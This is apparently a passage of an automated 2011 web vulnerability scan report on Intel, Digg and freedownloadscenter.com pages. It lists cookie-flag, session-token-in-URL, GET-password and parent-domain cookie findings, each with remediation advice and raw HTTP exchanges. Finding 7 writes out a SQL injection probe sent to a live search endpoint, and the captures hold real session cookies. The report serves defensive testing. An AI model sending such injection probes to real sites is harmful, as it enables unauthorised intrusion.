INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
Z: G15
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Content-Type: text/html
Cache-Control: no-cache
Expires: Sat, 05 Feb 2011 23:18:29 GMT
Date: Sat, 05 Feb 2011 23:18:29 GMT
Connection: close
Connection: Transfer-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Content-Length: 47184

...<html xmlns:wsml="urn:org:wsml:2003:html" xmlns:cd="urn:schemas-microsoft-com:xslt" xmlns:str="http://exslt.org/strings" xmlns:msxsl="urn:schemas-microsoft-com:xslt"><head><META http-equiv="Content
...[SNIP]...
<div id="hptopwhite"><form id="Form1" method="post" name="Form1"><table cellpadding="0" cellspacing="0" border="0" width="95%" align="center">
...[SNIP]...
<td><input size="26" class="text" id="txtPassword" onkeydown="if(event.keyCode==13) javascript:rememberme_check(param_a,param_b);" type="password" name="txtPassword"></td>
...[SNIP]...

7. SQL statement in request parameter

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.freedownloadscenter.com
Path:   /Search/newsearch.php3

Issue description

The request appears to contain SQL syntax. If this is incorporated into a SQL query and executed by the server, then the application is almost certainly vulnerable to SQL injection.

You should verify whether the request contains a genuine SQL query and whether this is being executed by the server.

Issue remediation

The application should not incorporate any user-controllable data directly into SQL queries. Parameterised queries (also known as prepared statements) should be used to safely insert data into predefined queries. In no circumstances should users be able to control or modify the structure of the SQL query itself.

Request

GET /Search/newsearch.php3?Category=(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)&Go=Go!&S_S=3 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.freedownloadscenter.com

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Date: Sat, 05 Feb 2011 23:23:15 GMT
Content-Type: text/html
Connection: keep-alive
Content-Length: 647
Keep-Alive: timeout=15, max=500

<br />
<b>Warning</b>: file(http://www.freedownloadscenter.com/mybeta/Search/newsearch.php3?q=3&amp;Category=(select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR
...[SNIP]...

8. SSL cookie without secure flag set

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://secure-newsroom.intel.com
Path:   /cs_login

Issue detail

The following cookie, shown in the response below, was issued by the application and does not have the secure flag set. The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Issue background

If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.

Issue remediation

The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.

Request

GET /cs_login HTTP/1.1
Host: secure-newsroom.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Date: Sat, 05 Feb 2011 23:16:35 GMT
Server: Apache
Set-Cookie: JSESSIONID=A4CC37F1E2D36D9C40FE66EF20991E8D.node7IPR; Domain=.intel.com; Path=/
Set-Cookie: ACEGI_SECURITY_HASHED_REMEMBER_ME_COOKIE=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
X-JAL: 0
Location: https://secure-newsroom.intel.com/login.jspa
Content-Length: 0
CacheHit: D=2495 t=1296947795404257
X-JSL: D=2500 t=1296947795404257
Connection: close
Content-Type: text/plain; charset=UTF-8


9. Session token in URL
There are 3 instances of this issue:

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.


9.1. http://www.intel.com/cd/channel/distributor/asmo-na/eng/index.htm

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.intel.com
Path:   /cd/channel/distributor/asmo-na/eng/index.htm

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /cd/channel/distributor/asmo-na/eng/index.htm?iid=subhdr+ptr_chan_disti HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
Z: G08
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Content-Type: text/html
Cache-Control: no-cache
Expires: Sat, 05 Feb 2011 23:18:36 GMT
Date: Sat, 05 Feb 2011 23:18:36 GMT
Connection: close
Connection: Transfer-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Content-Length: 35633

...<html xmlns:wsml="urn:org:wsml:2003:html" xmlns:str="http://exslt.org/strings" xmlns:msxsl="urn:schemas-microsoft-com:xslt"><head><META http-equiv="Content-Type" content="text/html; charset=utf-8">
...[SNIP]...
<div align="center" xmlns:vam="Intel.Ebusiness.CB06" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:cd="urn:schemas-microsoft-com:xslt" xmlns:soa="http://tempuri.org/"><a href="http://sales.liveperson.net/hc/56727252/?cmd=file&amp;file=visitorWantsToChat&amp;site=56727252&amp;byhref=1&amp;SESSIONVAR!skill=NAResellerPrograms-English&amp;imageUrl=http://www.intel.com/plt/cd/channel/channel/distributor/images/livechat/eng/" target="chat56727252" xmlns:cd="urn:cd-scripts"><img border="0" src="http://sales.liveperson.net/hc/56727252/?cmd=repstate&amp;site=56727252&amp;channel=web&amp;&amp;ver=1&amp;imageUrl=http://www.intel.com/plt/cd/channel/channel/distributor/images/l
...[SNIP]...

9.2. http://www.intel.com/cd/channel/reseller/asmo-na/eng/index.htm

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.intel.com
Path:   /cd/channel/reseller/asmo-na/eng/index.htm

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /cd/channel/reseller/asmo-na/eng/index.htm HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
Z: G15
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Content-Type: text/html
Cache-Control: no-cache
Expires: Sat, 05 Feb 2011 23:18:29 GMT
Date: Sat, 05 Feb 2011 23:18:29 GMT
Connection: close
Connection: Transfer-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Content-Length: 47184

...<html xmlns:wsml="urn:org:wsml:2003:html" xmlns:cd="urn:schemas-microsoft-com:xslt" xmlns:str="http://exslt.org/strings" xmlns:msxsl="urn:schemas-microsoft-com:xslt"><head><META http-equiv="Content
...[SNIP]...
<br><a href="http://sales.liveperson.net/hc/56727252/?cmd=file&amp;file=visitorWantsToChat&amp;site=56727252&amp;byhref=1&amp;SESSIONVAR%21skill=NAResellerPrograms-English&amp;imageUrl=http://www.intel.com/plt/cd/channel/channel/irc/images/livechat/eng/" target="chat56727252"><img src="http://chat.intel.com/hc/56727252/?cmd=repstate&amp;site=56727252&amp;channel=web&amp;&amp;ver=1&amp;imageUrl=http://www.intel.com/plt/cd/channel/channel/irc/images/livechat/eng/&amp;skill=NA
...[SNIP]...

9.3. http://www.intel.com/references/index.htm

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.intel.com
Path:   /references/index.htm

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /references/index.htm HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 200 OK
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Content-Type: text/html
Date: Sat, 05 Feb 2011 23:20:58 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 36568

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-US">
<head>
<title>Reference Room: Intel Business Success Stories</title>
...[SNIP]...
<li><a href="http://communities.intel.com/community/vproexpert;jsessionid=152C4B2202F8C74B9C1A846300448669">Intel. vPro. Expert Center</a>
...[SNIP]...
<li><a href="http://communities.intel.com/community/server;jsessionid=152C4B2202F8C74B9C1A846300448669">The Server Room</a>
...[SNIP]...

10. Password field submitted using GET method

Summary

Severity:   Low
Confidence:   Certain
Host:   http://digg.com
Path:   /submit

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method. The form contains the following password field (shown in the response below):

Issue background

The application uses the GET method to submit passwords, which are transmitted within the query string of the requested URL. Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing passwords into the URL increases the risk that they will be captured by an attacker.

Issue remediation

All forms submitting passwords should use the POST method. To achieve this, you should specify the method attribute of the FORM tag as method="POST". It may also be necessary to modify the corresponding server-side form handler to ensure that submitted passwords are properly retrieved from the message body, rather than the URL.

Request

GET /submit?url= HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:17:38 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Set-Cookie: traffic_control=1458898097449992448%3A180; expires=Sun, 06-Feb-2011 23:17:38 GMT; path=/; domain=digg.com
Set-Cookie: d=15436670eec4b706dbd3007684ea2ebb76af60eb4cc681ce1bc0e799ee3bcc18; expires=Fri, 05-Feb-2021 09:25:18 GMT; path=/; domain=.digg.com
X-Digg-Time: D=21375 10.2.129.225
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 7633

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg
- Submit a link
</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics
...[SNIP]...
</script><form class="hidden">
<input type="text" name="ident" value="" id="ident-saved">
<input type="password" name="password" value="" id="password-saved">
</form>
...[SNIP]...

11. Cookie scoped to parent domain
There are 57 instances of this issue:

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.


11.1. http://communities.intel.com/community/openportit/server

Summary

Severity:   Low
Confidence:   Firm
Host:   http://communities.intel.com
Path:   /community/openportit/server

Issue detail

The following cookie, shown in the response below, was issued by the application and is scoped to a parent of the issuing domain. The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/openportit/server HTTP/1.1
Host: communities.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:15:57 GMT
Server: Apache
Set-Cookie: JSESSIONID=C3BB5A4A6127C798AA423278CD19252D.node6OP; Domain=.intel.com; Path=/
Set-Cookie: SecureScheme=true; Secure
Set-Cookie: jive.server.info="serverName=communities.intel.com:serverPort=80:contextPath=:localName=communities.intel.com:localPort=80:localAddr=communities.intel.com"; Version=1; Path=/
Set-Cookie: jive.recentHistory.-1=31342c323031353b; Expires=Mon, 07-Mar-2011 23:15:59 GMT; Path=/
X-JAL: 876
Content-Language: en-US
CacheHit: D=884319 t=1296947757183516
X-JSL: D=884325 t=1296947757183516
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

11.2. http://communities.intel.com/community/openportit/vproexpert

Summary

Severity:   Low
Confidence:   Firm
Host:   http://communities.intel.com
Path:   /community/openportit/vproexpert

Issue detail

The following cookie, shown in the response below, was issued by the application and is scoped to a parent of the issuing domain. The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/openportit/vproexpert HTTP/1.1
Host: communities.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:15:57 GMT
Server: Apache
Set-Cookie: JSESSIONID=106FD2976BE417AFAD454527A8018E4E.node7OP; Domain=.intel.com; Path=/
Set-Cookie: SecureScheme=true; Secure
Set-Cookie: jive.server.info="serverName=communities.intel.com:serverPort=80:contextPath=:localName=communities.intel.com:localPort=80:localAddr=communities.intel.com"; Version=1; Path=/
Set-Cookie: jive.recentHistory.-1=31342c323030353b; Expires=Mon, 07-Mar-2011 23:15:59 GMT; Path=/
X-JAL: 255
Content-Language: en-US
CacheHit: D=264764 t=1296947757157494
X-JSL: D=264770 t=1296947757157494
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

11.3. http://communities.intel.com/community/tech

Summary

Severity:   Low
Confidence:   Firm
Host:   http://communities.intel.com
Path:   /community/tech

Issue detail

The following cookie, shown in the response below, was issued by the application and is scoped to a parent of the issuing domain. The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/tech HTTP/1.1
Host: communities.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:15:55 GMT
Server: Apache
Set-Cookie: JSESSIONID=A6A7D75900DB7F9498266317E36D34BE.node7OP; Domain=.intel.com; Path=/
Set-Cookie: SecureScheme=true; Secure
Set-Cookie: jive.server.info="serverName=communities.intel.com:serverPort=80:contextPath=:localName=communities.intel.com:localPort=80:localAddr=communities.intel.com"; Version=1; Path=/
Set-Cookie: jive.recentHistory.-1=31342c323038313b; Expires=Mon, 07-Mar-2011 23:15:57 GMT; Path=/
X-JAL: 269
Content-Language: en-US
CacheHit: D=278002 t=1296947755835805
X-JSL: D=278007 t=1296947755835805
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

11.4. http://communities.intel.com/community/tech/desktop

Summary

Severity:   Low
Confidence:   Firm
Host:   http://communities.intel.com
Path:   /community/tech/desktop

Issue detail

The following cookie, shown in the response below, was issued by the application and is scoped to a parent of the issuing domain. The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/tech/desktop HTTP/1.1
Host: communities.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:15:53 GMT
Server: Apache
Set-Cookie: JSESSIONID=655258FED1C8CE54639970DB6AAC28EB.node7OP; Domain=.intel.com; Path=/
Set-Cookie: SecureScheme=true; Secure
Set-Cookie: jive.server.info="serverName=communities.intel.com:serverPort=80:contextPath=:localName=communities.intel.com:localPort=80:localAddr=communities.intel.com"; Version=1; Path=/
Set-Cookie: jive.recentHistory.-1=31342c323038323b; Expires=Mon, 07-Mar-2011 23:15:54 GMT; Path=/
X-JAL: 111
Content-Language: en-US
CacheHit: D=120980 t=1296947753199224
X-JSL: D=120985 t=1296947753199224
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

11.5. http://communities.intel.com/index.jspa

Summary

Severity:   Low
Confidence:   Firm
Host:   http://communities.intel.com
Path:   /index.jspa

Issue detail

The following cookie, shown in the response below, was issued by the application and is scoped to a parent of the issuing domain. The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /index.jspa HTTP/1.1
Host: communities.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:15:52 GMT
Server: Apache
Set-Cookie: JSESSIONID=84414FB0E56F8779A8C027A76AA897B4.node7OP; Domain=.intel.com; Path=/
Set-Cookie: SecureScheme=true; Secure
Set-Cookie: jive.server.info="serverName=communities.intel.com:serverPort=80:contextPath=:localName=communities.intel.com:localPort=80:localAddr=communities.intel.com"; Version=1; Path=/
X-JAL: 497
Content-Language: en-US
CacheHit: D=506181 t=1296947752876810
X-JSL: D=506186 t=1296947752876810
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

11.6. http://newsroom.intel.com/4.0.6/resources/scripts/gen/0e7c6c42e74b788f13ba0b4d8d125742.js

Summary

Severity:   Low
Confidence:   Firm
Host:   http://newsroom.intel.com
Path:   /4.0.6/resources/scripts/gen/0e7c6c42e74b788f13ba0b4d8d125742.js

Issue detail

The following cookie, shown in the response below, was issued by the application and is scoped to a parent of the issuing domain. The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /4.0.6/resources/scripts/gen/0e7c6c42e74b788f13ba0b4d8d125742.js HTTP/1.1
Host: newsroom.intel.com
Proxy-Connection: keep-alive
Referer: http://newsroom.intel.com/community/intel_newsroom/?iid=ftr+press
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; cf=0; countrylang=United%20States%20-%20English; intelresearchSTGref=NONE; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_cc=true; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmv=; __utma=1.167981993.1296947562.1296947562.1296947562.1; __utmc=1; __utmb=1.1.10.1296947562; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel; s_lv=1296947567228; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/index.htm; s_sq=intelcorp%2Cintelcorpcim%2Cintelcorpport%3D%2526pid%253Dcim%25253A/about/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; 